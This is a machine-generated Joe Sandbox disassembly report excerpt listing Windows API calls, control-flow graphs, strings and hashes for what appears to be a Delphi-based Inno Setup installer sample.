                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                            • API String ID: 190572456-1821436788
                                                            • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                            • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                            • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                            • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1982 406334-40634e GetModuleHandleA GetProcAddress 1983 406350 1982->1983 1984 406357-406364 GetProcAddress 1982->1984 1983->1984 1985 406366 1984->1985 1986 40636d-40637a GetProcAddress 1984->1986 1985->1986 1987 406380-406381 1986->1987 1988 40637c-40637e SetProcessDEPPolicy 1986->1988 1988->1987
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                            • API String ID: 3256987805-3653653586
                                                            • Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                            • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                            • Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                            • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2618 423884-42388e 2619 4239b7-4239bb 2618->2619 2620 423894-4238b6 call 41f3d4 GetClassInfoA 2618->2620 2623 4238e7-4238f0 GetSystemMetrics 2620->2623 2624 4238b8-4238cf RegisterClassA 2620->2624 2626 4238f2 2623->2626 2627 4238f5-4238ff GetSystemMetrics 2623->2627 2624->2623 2625 4238d1-4238e2 call 408cc4 call 40311c 2624->2625 2625->2623 2626->2627 2628 423901 2627->2628 2629 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2627->2629 2628->2629 2641 423962-423975 call 424188 SendMessageA 2629->2641 2642 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2629->2642 2641->2642 2642->2619 2644 4239aa-4239b2 DeleteMenu 2642->2644 2644->2619
                                                            APIs
                                                              • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                            • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                            • RegisterClassA.USER32(00499630), ref: 004238C7
                                                            • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                            • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                            • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                            • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                            • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                            • String ID:
                                                            • API String ID: 183575631-0
                                                            • Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                            • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                            • Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                            • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2646 4674ec-467596 call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2655 4675cb-4675d6 call 478d20 2646->2655 2656 467598-46759f 2646->2656 2661 467627-46763a call 47cff4 2655->2661 2662 4675d8-46761d call 42c40c call 40357c call 403738 ExtractIconA call 46742c 2655->2662 2656->2655 2658 4675a1-4675c6 ExtractIconA call 46742c 2656->2658 2658->2655 2668 46763c-467646 call 47cff4 2661->2668 2669 46764b-46764f 2661->2669 2684 467622 2662->2684 2668->2669 2671 467651-467674 call 403738 SHGetFileInfo 2669->2671 2672 4676a9-4676dd call 403400 * 2 2669->2672 2671->2672 2680 467676-46767d 2671->2680 2680->2672 2683 46767f-4676a4 ExtractIconA call 46742c 2680->2683 2683->2672 2684->2672
                                                            APIs
                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                              • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                              • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                            • String ID: c:\directory$k H$shell32.dll
                                                            • API String ID: 3376378930-433663191
                                                            • Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                            • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                            • Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                            • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2688 42f570-42f57a 2689 42f584-42f5c1 call 402b30 GetActiveWindow GetFocus call 41eeb4 2688->2689 2690 42f57c-42f57f call 402d30 2688->2690 2696 42f5d3-42f5db 2689->2696 2697 42f5c3-42f5cd RegisterClassA 2689->2697 2690->2689 2698 42f662-42f67e SetFocus call 403400 2696->2698 2699 42f5e1-42f612 CreateWindowExA 2696->2699 2697->2696 2699->2698 2701 42f614-42f658 call 42428c call 403738 CreateWindowExA 2699->2701 2701->2698 2707 42f65a-42f65d ShowWindow 2701->2707 2707->2698
                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 0042F59F
                                                            • GetFocus.USER32 ref: 0042F5A7
                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                            • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 3167913817-1824977358
                                                            • Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                            • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                            • Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                            • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                            • API String ID: 1646373207-2130885113
                                                            • Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                            • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                            • Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                            • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                            APIs
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                            • API String ID: 1375471231-1421604804
                                                            • Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                            • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                            • Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                            • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                            APIs
                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                            • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                            • API String ID: 4130936913-2943970505
                                                            • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                            • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                            • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                            • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                            APIs
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                            • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                            • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID: "*G$"*G
                                                            • API String ID: 2066263336-450946878
                                                            • Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                            • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                            • Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                            • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                              • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                              • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                              • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                              • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                            • API String ID: 854858120-615399546
                                                            • Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                            • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                            • Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                            • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                            APIs
                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                            • OemToCharA.USER32(?,?), ref: 0042376C
                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                            • String ID: 2$MAINICON
                                                            • API String ID: 3935243913-3181700818
                                                            • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                            • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                            • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                            • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                              • Part of subcall function 004230D8: 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                              • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                              • Part of subcall function 004230D8: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                              • Part of subcall function 004230D8: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                              • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                              • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                              • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                              • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                              • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                              • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                            • API String ID: 1580766901-2767913252
                                                            • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
